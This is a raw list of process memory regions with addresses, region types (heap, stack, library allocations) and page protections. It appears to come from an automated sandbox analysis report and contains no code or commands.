7FF848B2D000
trusted library allocation
page execute and read and write
BA0000
heap
page read and write
1CD30000
trusted library section
page read and write
207DCB6F000
heap
page read and write
207DD7E0000
trusted library allocation
page read and write
1DA64BC6000
heap
page execute and read and write
207E0002000
heap
page read and write
5399000
trusted library allocation
page read and write
2003E500000
trusted library allocation
page read and write
20026FEA000
trusted library allocation
page read and write
1C97252C000
heap
page read and write
F7E96FB000
stack
page read and write
7FF848E7C000
trusted library allocation
page read and write
146301D0000
heap
page read and write
207E0384000
heap
page read and write
207DD666000
unkown
page readonly
7FF848BA6000
trusted library allocation
page read and write
1D94B000
stack
page read and write
1D99EA46000
heap
page read and write
14630228000
heap
page read and write
247BD8D0000
heap
page read and write
981E116000
stack
page read and write
14635620000
trusted library allocation
page read and write
207DF010000
heap
page read and write
207DDDD8000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
207D31DA000
heap
page read and write
1D99EE86000
heap
page read and write
20025C20000
trusted library section
page read and write
207D0D25000
heap
page read and write
207DC6E0000
trusted library allocation
page read and write
207D0D89000
heap
page read and write
9E0000
heap
page read and write
BAB56EB000
stack
page read and write
F7EC5FF000
stack
page read and write
207DDC13000
heap
page read and write
12AA0000
trusted library allocation
page read and write
2003E3F0000
heap
page read and write
207DCCEA000
unkown
page read and write
207D3186000
heap
page read and write
2BF9CED0000
heap
page read and write
7FF848DD0000
trusted library allocation
page read and write
20027D25000
trusted library allocation
page read and write
146358F6000
heap
page read and write
146357E0000
trusted library allocation
page read and write
1D99E86B000
heap
page read and write
7FF848C40000
trusted library allocation
page execute and read and write
207D31AC000
heap
page read and write
12ADE000
trusted library allocation
page read and write
F7ECBFD000
stack
page read and write
201C526E000
heap
page read and write
14635A50000
remote allocation
page read and write
2003E2AA000
heap
page read and write
207DCFBD000
heap
page read and write
7FF848BF6000
trusted library allocation
page execute and read and write
1D466D09000
trusted library allocation
page read and write
C4BF4FD000
stack
page read and write
20026E8D000
trusted library allocation
page read and write
2E21000
trusted library allocation
page read and write
2003E312000
heap
page read and write
207DC64C000
unkown
page readonly
146356B0000
trusted library allocation
page read and write
1463028E000
heap
page read and write
247BF5C1000
trusted library allocation
page read and write
201AD871000
trusted library allocation
page read and write
1AC8E5FA000
trusted library allocation
page read and write
207DEFB8000
heap
page read and write
201C5116000
heap
page execute and read and write
24E97FB5000
heap
page read and write
207DC9C0000
trusted library allocation
page read and write
1D463D0D000
heap
page read and write
1D466A04000
trusted library allocation
page read and write
1AC9E551000
trusted library allocation
page read and write
1D99EEEC000
heap
page read and write
1AC8CA8C000
heap
page read and write
1AC8CBA3000
trusted library allocation
page read and write
207E0300000
heap
page read and write
CF5000
heap
page read and write
7FF848CF0000
trusted library allocation
page read and write
5B6E6BE000
stack
page read and write
7FF848B10000
trusted library allocation
page read and write
201AB180000
heap
page read and write
1AC8CA8E000
heap
page read and write
7FF848D02000
trusted library allocation
page read and write
1D99E9D4000
heap
page read and write
7FF848DF0000
trusted library allocation
page read and write
2BF9D080000
trusted library allocation
page read and write
1D466392000
trusted library allocation
page read and write
1DA7D200000
heap
page read and write
207D5C2F000
heap
page read and write
207E0400000
heap
page read and write
7FF848BC0000
trusted library allocation
page execute and read and write
1D99E857000
heap
page read and write
201C5272000
heap
page read and write
1D99E89C000
heap
page read and write
7FF848B4D000
trusted library allocation
page execute and read and write
7FF848D70000
trusted library allocation
page read and write
7FF848CF8000
trusted library allocation
page read and write
7FF848E23000
trusted library allocation
page read and write
207DEF9D000
heap
page read and write
7FF848DE0000
trusted library allocation
page read and write
14630200000
heap
page read and write
207D0D5B000
heap
page read and write
207DCDE4000
unkown
page readonly
204B5CC000
stack
page read and write
1E9E2142000
heap
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
20025D80000
heap
page read and write
207DDC10000
heap
page read and write
1DA7D2F0000
heap
page execute and read and write
2BFAEB41000
trusted library allocation
page read and write
12943000
trusted library allocation
page read and write
1D99EFAB000
heap
page read and write
590000
heap
page read and write
7FF848C16000
trusted library allocation
page execute and read and write
C7E000
heap
page read and write
1D99EF21000
heap
page read and write
1D630000
heap
page read and write
207DD8F0000
trusted library allocation
page read and write
207E0000000
heap
page read and write
146312D0000
trusted library section
page readonly
207DD650000
trusted library allocation
page read and write
201C5282000
heap
page read and write
D07AECD000
stack
page read and write
7FF848B10000
trusted library allocation
page read and write
1DA66632000
trusted library allocation
page read and write
7FF848E20000
trusted library allocation
page read and write
1DA74F13000
trusted library allocation
page read and write
1D99EAF0000
heap
page read and write
53A9000
trusted library allocation
page read and write
14635800000
trusted library allocation
page read and write
7FF848B22000
trusted library allocation
page read and write
20035F51000
trusted library allocation
page read and write
101D000
heap
page read and write
7FF848AFD000
trusted library allocation
page execute and read and write
7FF848D12000
trusted library allocation
page read and write
201C54E0000
heap
page read and write
207DE769000
heap
page read and write
BAB63FE000
stack
page read and write
7FF848D40000
trusted library allocation
page read and write
1061000
heap
page read and write
207DC690000
trusted library allocation
page read and write
1AC8E6D6000
trusted library allocation
page read and write
207DC6B0000
trusted library allocation
page read and write
1D99EF32000
heap
page read and write
1D47DFDD000
heap
page read and write
1E9E20C2000
heap
page read and write
201ADB95000
trusted library allocation
page read and write
BCA000
heap
page read and write
7FF848CD0000
trusted library allocation
page execute and read and write
D079EFE000
stack
page read and write
A1A000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
7FF848B3B000
trusted library allocation
page read and write
7FF848F10000
trusted library allocation
page read and write
1DA7D0C1000
heap
page read and write
204AAFE000
stack
page read and write
1D463D9B000
heap
page read and write
2003E6A8000
heap
page read and write
247BDB64000
heap
page read and write
1D99E9A3000
heap
page read and write
F7EB9FC000
stack
page read and write
1DA663A7000
trusted library allocation
page read and write
207DC630000
trusted library allocation
page read and write
207DD780000
trusted library allocation
page read and write
263F000
stack
page read and write
207DE57A000
unkown
page execute read
20024398000
heap
page read and write
7FF848B30000
trusted library allocation
page read and write
F7EACFB000
stack
page read and write
1E9E20F9000
heap
page read and write
207DC37F000
trusted library allocation
page read and write
207DC361000
trusted library allocation
page read and write
E84000
heap
page read and write
207D5C00000
heap
page read and write
1E5FD000
heap
page read and write
1D99E87B000
heap
page read and write
201C53A3000
heap
page read and write
201C5306000
heap
page read and write
1AC8E683000
trusted library allocation
page read and write
2DB1000
trusted library allocation
page read and write
D079E7B000
stack
page read and write
207DC6A0000
trusted library allocation
page read and write
1C9724E0000
heap
page read and write
1DA65FA7000
trusted library allocation
page read and write
24E98160000
heap
page read and write
1DA63030000
heap
page read and write
7FF848BF6000
trusted library allocation
page execute and read and write
20025C60000
heap
page readonly
1D99EFBC000
heap
page read and write
7FF848D70000
trusted library allocation
page read and write
207DCFF9000
heap
page read and write
207D0CCB000
heap
page read and write
F7EB2FF000
stack
page read and write
7FF6373FA000
unkown
page readonly
14635723000
trusted library allocation
page read and write
7FF848DA0000
trusted library allocation
page read and write
1B780000
heap
page read and write
7FF848E50000
trusted library allocation
page read and write
920000
trusted library allocation
page read and write
201ADEC7000
trusted library allocation
page read and write
1C3E0000
heap
page read and write
1D99EFCE000
heap
page read and write
247BF4E0000
trusted library allocation
page read and write
207DC380000
trusted library allocation
page read and write
7FF49B400000
trusted library allocation
page execute and read and write
12E79000
trusted library allocation
page read and write
1D99E877000
heap
page read and write
7FF848E40000
trusted library allocation
page read and write
7F0000
heap
page read and write
7FF848E49000
trusted library allocation
page read and write
146302A0000
heap
page read and write
1D99E7FE000
heap
page read and write
207D3177000
heap
page read and write
7FF848BF6000
trusted library allocation
page execute and read and write
1D99F002000
heap
page read and write
2BF9D110000
heap
page read and write
535E000
trusted library allocation
page read and write
7FF848C06000
trusted library allocation
page execute and read and write
1D466B1F000
trusted library allocation
page read and write
1D99EEA8000
heap
page read and write
247BD941000
heap
page read and write
C4BF2FD000
stack
page read and write
207E021A000
heap
page read and write
1D465941000
trusted library allocation
page read and write
F7ED5FA000
stack
page read and write
4F2B000
trusted library allocation
page read and write
7FF848D30000
trusted library allocation
page read and write
7FF848F50000
trusted library allocation
page read and write
7FF848F2C000
trusted library allocation
page read and write
207DD42F000
heap
page read and write
1C9E8000
stack
page read and write
14635A50000
remote allocation
page read and write
2BF9CE93000
heap
page read and write
1D99EA58000
heap
page read and write
536C000
trusted library allocation
page read and write
2003E724000
heap
page read and write
1D99EA58000
heap
page read and write
207DE62E000
heap
page read and write
1BA6E000
stack
page read and write
207DDC20000
heap
page read and write
7FF848B03000
trusted library allocation
page execute and read and write
7FF848B42000
trusted library allocation
page read and write
7FF848D70000
trusted library allocation
page read and write
201ACD28000
trusted library allocation
page read and write
2EF977E000
unkown
page readonly
207DCF4B000
heap
page read and write
201BCDFA000
trusted library allocation
page read and write
9CA897E000
stack
page read and write
207DD8F0000
trusted library allocation
page read and write
7FF848DB0000
trusted library allocation
page read and write
207D0D0A000
heap
page read and write
8F1000
stack
page read and write
247D7DA1000
heap
page read and write
1D99E8A9000
heap
page read and write
1E9E221A000
trusted library allocation
page read and write
7FF848F30000
trusted library allocation
page execute and read and write
1D47DD36000
heap
page read and write
1D99E853000
heap
page read and write
52E4000
trusted library allocation
page read and write
1D99E8A9000
heap
page read and write
2BFB7379000
heap
page read and write
7FF848B13000
trusted library allocation
page execute and read and write
1D47DFF9000
heap
page read and write
2EF7C77000
stack
page read and write
2EF967E000
stack
page read and write
1B1DE000
stack
page read and write
207D5E40000
trusted library section
page readonly
1E9E6496000
heap
page read and write
7FF789E06000
unkown
page read and write
2B80000
heap
page execute and read and write
9C6EDFF000
stack
page read and write
1C9725AE000
heap
page read and write
There are 2992 hidden memdumps, click here to show them.